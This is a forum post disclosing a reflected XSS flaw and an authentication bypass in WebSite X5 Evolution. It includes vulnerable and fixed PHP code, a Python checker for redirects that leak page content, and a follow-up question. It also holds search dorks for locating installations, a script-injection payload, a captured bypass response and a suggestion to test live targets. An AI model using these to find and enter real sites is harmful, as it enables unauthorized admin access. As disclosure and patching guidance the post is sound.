Htich Posted February 2, 2014

=========================================
Vulnerable Software: Incomedia WebSite X5 Evolution <= 9.0.4.1748 (All versions)
Vendor: www.websitex5.com
Vulns: XSS && Auth Bypass
Software License: Commercial
Dork 1: inurl:imsearch.php
Dork 2: intitle:WebSite X5 Manager inurl:/admin/header.php
=========================================

About Software:
==========================================
WebSite X5 Evolution 9 is the most versatile and complete solution you'll find for creating eye-catching, functional and professional websites, blogs and online stores. You'll be surprised at how easy WebSite X5 Evolution 9 is to use, but what is perhaps most amazing is the sheer power and totality of the features it offers.
http://www.websitex5.com/en/evolution-9.html
*Nice software and easy to use.*
==========================================

About Vulnerabilities:

[*] XSS:
[*] site.tld/imsearch.php?search="\><script>alert(1);</script>

Fix: Open imsearch.php and find:

=============VULNERABLE CODE==============
<?php
// The search term and page number are passed straight from the query string
// into the search output without any escaping.
$search = new imSearch();
$search->search(@$_GET['search'], @$_GET['page']);
?>
==========END OF VULNERABLE CODE==========

REPLACE WITH:

==============FIXED CODE====================
<?php
// HTML-escape both parameters before they reach the search output.
$search = new imSearch();
$search->search(htmlspecialchars(@$_GET['search']), htmlspecialchars(@$_GET['page']));
?>
===========END OF FIXED CODE================

[*] Second vulnerability is Authentication Bypass.
[*] Vulnerable code: site.tld/admin/checkaccess.php

========= BEGIN VULNERABLE CODE ===========
<?php
require_once("../res/x5engine.php");
$login = new imPrivateArea();
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
    // The redirect header is set, but the script is not stopped: execution
    // falls through and the admin page that included this file still runs.
    if (basename($_SERVER['HTTP_REFERER']) == "login.php")
        header("Location: login.php?error");
    else
        header("Location: login.php");
} else
    $logged = TRUE;
// End of file checkaccess.php
==========END OF VULNERABLE CODE==========

Notice the flaw: the script continues execution.

To reproduce:
===============================================
Using Fiddler, intercept the traffic from your browser and you will get the output from the script's execution.
Print screen: http://oi47.tinypic.com/f21sf7.jpg

==================== RAW =======================
HTTP/1.1 302 Found
Date: Sun, 25 Nov 2012 01:13:19 GMT
Server: Apache
Set-Cookie: ASPX=pfsnkn5ccps9u15pa0r4of6lodesg6lq; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: login.php
Content-Length: 1188
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="it" />
<meta http-equiv="Content-Type-Script" content="text/javascript" />
<meta http-equiv="ImageToolbar" content="False" />
<meta name="MSSmartTagsPreventParsing" content="True" />
<script type="text/javascript" src="../res/jquery.js"></script>
<script type="text/javascript" src="../res/x5engine.js"></script>
<link rel="stylesheet" type="text/css" href="template.css" media="screen" />
<title>WebSite X5 Manager</title>
</head>
<body>
<div id="imAdminPage">
<div id="imBody">
<div class="imSectionTitle"></div>
<div class="imContent">
<div class="imTest pass">?????? PHP: 5.2.17<span>PASS</span></div>
<div class="imTest pass">????????? ??????<span>PASS</span></div>
<div class="imTest pass">???? ? ????????? ????? ?? ???????<span>PASS</span></div>
</div>
</div>
</div>
</body>
===============EOF RAW==================

If your checkaccess.php isn't patched, every file in /admin/*.php is vulnerable.

Fixed Code: site.tld/admin/checkaccess.php
==============BEGIN FIXED CODE=================
<?php
require_once("../res/x5engine.php");
$login = new imPrivateArea();
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
    // Stop right after sending the redirect so the including admin page
    // never executes for an unauthenticated request.
    if (basename($_SERVER['HTTP_REFERER']) == "login.php") {
        header("Location: login.php?error");
        exit;
    } else {
        header("Location: login.php");
        exit;
    }
} else {
    $logged = TRUE;
}
// End of file checkaccess.php
===============END OF FIXED CODE================
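The symptom the post tells you to look for in Fiddler is a 302 redirect whose body still carries the admin page, which is what a header("Location: ...") without exit produces. The following is an added example, not part of the advisory or of WebSite X5: a small Python check that takes a raw HTTP response (as captured with Fiddler or curl -i) and flags a redirect that leaks application output. The three sample responses are constructed here for the example; the first is modeled on the capture in the post with the body shortened.

```python
"""Offline check for the "header() without exit" pattern.

Added example, not code from the advisory or from WebSite X5. A PHP script that
sends a Location header and then exits produces a redirect with an empty body
(or the web server's short "document has moved" stub). A redirect that carries
a real page body means the script kept running after the access check failed.
"""
from typing import Dict

REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_response(raw: bytes) -> Dict[str, object]:
    """Split a raw HTTP/1.x response into status code, headers and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:  # tolerate captures saved with LF line endings
        head, sep, body = raw.partition(b"\n\n")
    lines = head.decode("iso-8859-1").splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"status": status, "headers": headers, "body": body}


def is_redirect_stub(body: bytes) -> bool:
    """True for the short placeholder page a server adds to a bare redirect."""
    text = body.decode("utf-8", "replace").lower()
    return len(body) < 512 and ("moved" in text or "redirect" in text)


def redirect_leaks_body(raw: bytes) -> bool:
    """Return True when a redirect response still carries application output.

    This is the bypass described in the post: checkaccess.php sends
    "Location: login.php" but does not exit, so the admin page that included
    it runs anyway and its HTML is delivered together with the 302.
    """
    resp = parse_response(raw)
    if resp["status"] not in REDIRECT_CODES:
        return False
    body = resp["body"].strip()
    return bool(body) and not is_redirect_stub(body)


# Constructed sample modeled on the capture in the post (body shortened).
VULNERABLE_CAPTURE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: Apache\r\n"
    b"Location: login.php\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><head><title>WebSite X5 Manager</title></head><body>"
    b"<div class=\"imTest pass\">PHP: 5.2.17<span>PASS</span></div>"
    b"</body></html>"
)

# Constructed sample of the patched behaviour: exit right after header().
PATCHED_CAPTURE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: Apache\r\n"
    b"Location: login.php\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Constructed sample of an ordinary 200 page, which is not a redirect at all.
LOGGED_IN_PAGE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>admin</body></html>"
)

if __name__ == "__main__":
    samples = [
        ("vulnerable", VULNERABLE_CAPTURE),
        ("patched", PATCHED_CAPTURE),
        ("logged in", LOGGED_IN_PAGE),
    ]
    for name, raw in samples:
        print(f"{name}: leaks body after redirect = {redirect_leaks_body(raw)}")
```

To use it against a live target, save the response of any /admin/*.php request with redirects disabled (curl -i -s, or Fiddler's raw view) and pass the bytes to redirect_leaks_body(); a True result reproduces the finding above without needing to read the HTML by eye.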
joetunna Posted February 16, 2014

Some instructions, is that possible?